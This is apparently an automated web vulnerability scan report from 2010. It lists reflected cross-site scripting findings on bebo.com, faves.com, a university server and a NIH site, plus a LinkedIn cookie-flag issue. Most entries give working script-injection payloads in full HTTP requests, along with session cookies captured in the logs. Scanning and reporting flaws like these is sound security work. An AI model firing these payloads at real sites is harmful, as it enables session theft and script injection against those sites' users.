HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10294 Date: Mon, 15 Nov 2010 22:43:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e12be'><script>alert(1)</script>ba73354d12e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/invite/joine12be'><script>alert(1)</script>ba73354d12e HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10488 Date: Mon, 15 Nov 2010 22:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d36b9<img%20src%3da%20onerror%3dalert(1)>29fa93aced1 was submitted in the REST URL parameter 3. This input was echoed as d36b9<img src=a onerror=alert(1)>29fa93aced1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/invite/joind36b9<img%20src%3da%20onerror%3dalert(1)>29fa93aced1 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10564 Date: Mon, 15 Nov 2010 22:43:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a49f2"><img%20src%3da%20onerror%3dalert(1)>3514e64845a was submitted in the REST URL parameter 3. This input was echoed as a49f2"><img src=a onerror=alert(1)>3514e64845a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/invite/joina49f2"><img%20src%3da%20onerror%3dalert(1)>3514e64845a HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10582 Date: Mon, 15 Nov 2010 22:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7b2"><img%20src%3da%20onerror%3dalert(1)>5df38fd435e was submitted in the REST URL parameter 2. This input was echoed as 4c7b2"><img src=a onerror=alert(1)>5df38fd435e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/mobebo4c7b2"><img%20src%3da%20onerror%3dalert(1)>5df38fd435e/ HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10821 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e41af'><script>alert(1)</script>27c3609032 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/mobeboe41af'><script>alert(1)</script>27c3609032/ HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10729 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1556'%3bf8f7502b114 was submitted in the REST URL parameter 2. This input was echoed as c1556';f8f7502b114 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/mobeboc1556'%3bf8f7502b114/ HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10527 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c72e1<script>alert(1)</script>5aab46f2d5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/mobeboc72e1<script>alert(1)</script>5aab46f2d5e/ HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10720 Date: Mon, 15 Nov 2010 22:43:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/mobeboc72e1<script>alert(1)</script>5aab46f2d5e/ page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1507f<script>alert(1)</script>338e0d730eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/share1507f<script>alert(1)</script>338e0d730eb HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/share1507f<script>alert(1)</script>338e0d730eb page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66059'><script>alert(1)</script>776b7e57e15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/share66059'><script>alert(1)</script>776b7e57e15 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e6e8"><img%20src%3da%20onerror%3dalert(1)>468561ebcf0 was submitted in the REST URL parameter 2. This input was echoed as 5e6e8"><img src=a onerror=alert(1)>468561ebcf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/share5e6e8"><img%20src%3da%20onerror%3dalert(1)>468561ebcf0 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98778'%3b9c2457d3915 was submitted in the REST URL parameter 2. This input was echoed as 98778';9c2457d3915 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/share98778'%3b9c2457d3915 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0c67'><script>alert(1)</script>6856ba7fe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d04fe"><img%20src%3da%20onerror%3dalert(1)>f03e823eb6e was submitted in the REST URL parameter 2. This input was echoed as d04fe"><img src=a onerror=alert(1)>f03e823eb6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2991<script>alert(1)</script>fd8b3bf9793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Content-Length: 9166 Vary: Accept-Encoding Date: Mon, 15 Nov 2010 22:42:52 GMT Connection: close X-N: S
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: lo sentimos, no hemos encontrado la p..gina/c/sitea2991<script>alert(1)</script>fd8b3bf9793/index ..Vuelve a intentarlo!</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb28f'%3b95e646b96f6 was submitted in the REST URL parameter 2. This input was echoed as eb28f';95e646b96f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1a5b"><img%20src%3da%20onerror%3dalert(1)>588edead6ae was submitted in the REST URL parameter 3. This input was echoed as a1a5b"><img src=a onerror=alert(1)>588edead6ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 77608<img%20src%3da%20onerror%3dalert(1)>6477631e14 was submitted in the REST URL parameter 3. This input was echoed as 77608<img src=a onerror=alert(1)>6477631e14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd6d'%3b03cd0db8700 was submitted in the REST URL parameter 3. This input was echoed as cdd6d';03cd0db8700 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 882ca'><script>alert(1)</script>586619cfcf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e459c'%3bc20c3c8eede was submitted in the REST URL parameter 2. This input was echoed as e459c';c20c3c8eede in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 320f6'><script>alert(1)</script>bdaacd127e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b058a"><img%20src%3da%20onerror%3dalert(1)>c3907c87272 was submitted in the REST URL parameter 2. This input was echoed as b058a"><img src=a onerror=alert(1)>c3907c87272 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcd7c<script>alert(1)</script>c9aa4bc7a66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Content-Length: 9571 Vary: Accept-Encoding Date: Mon, 15 Nov 2010 22:42:51 GMT Connection: close X-N: S
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: lo sentimos, no hemos encontrado la p..gina/c/sitefcd7c<script>alert(1)</script>c9aa4bc7a66/regframe ..Vuelve a intentarlo!</div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd01"><img%20src%3da%20onerror%3dalert(1)>7c88a3e4f5a was submitted in the REST URL parameter 3. This input was echoed as 5bd01"><img src=a onerror=alert(1)>7c88a3e4f5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6f44<img%20src%3da%20onerror%3dalert(1)>60cebd7bda9 was submitted in the REST URL parameter 3. This input was echoed as a6f44<img src=a onerror=alert(1)>60cebd7bda9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b617'%3b1efa53ce66b was submitted in the REST URL parameter 3. This input was echoed as 4b617';1efa53ce66b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f2c'><script>alert(1)</script>ae5c2e22b9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2c7"%3balert(1)//091fe41f8e3 was submitted in the u parameter. This input was echoed as 8d2c7";alert(1)//091fe41f8e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Authoring.aspx?u=8d2c7"%3balert(1)//091fe41f8e3 HTTP/1.1 Host: www.faves.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Mon, 15 Nov 2010 22:42:35 GMT Server: Microsoft-IIS/6.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 10884 Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 840cd<script>alert(1)</script>f25dc1f7315 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /~mr99164/index.php HTTP/1.1 Host: alas.matf.bg.ac.rs Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)840cd<script>alert(1)</script>f25dc1f7315 Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:26 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_jk/1.2.26 X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8629
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www ...[SNIP]... <code class="unos"> 15.11.2010. 23:41:26 alas.matf.bg.ac.rs/174.122.23.218 [Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)840cd<script>alert(1)</script>f25dc1f7315] </code> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c53f6<script>alert(1)</script>2e07061e556 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /~mr99164/posta.php HTTP/1.1 Host: alas.matf.bg.ac.rs Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c53f6<script>alert(1)</script>2e07061e556 Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:26 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_jk/1.2.26 X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7892
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www ...[SNIP]... <code class="unos"> 15.11.2010. 23:41:26 alas.matf.bg.ac.rs/174.122.23.218 [Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c53f6<script>alert(1)</script>2e07061e556] </code> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa1fb"><script>alert(1)</script>080bc028c2e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /medlineplus/contact/index.cfm HTTP/1.1 Host: apps.nlm.nih.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aa1fb"><script>alert(1)</script>080bc028c2e
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
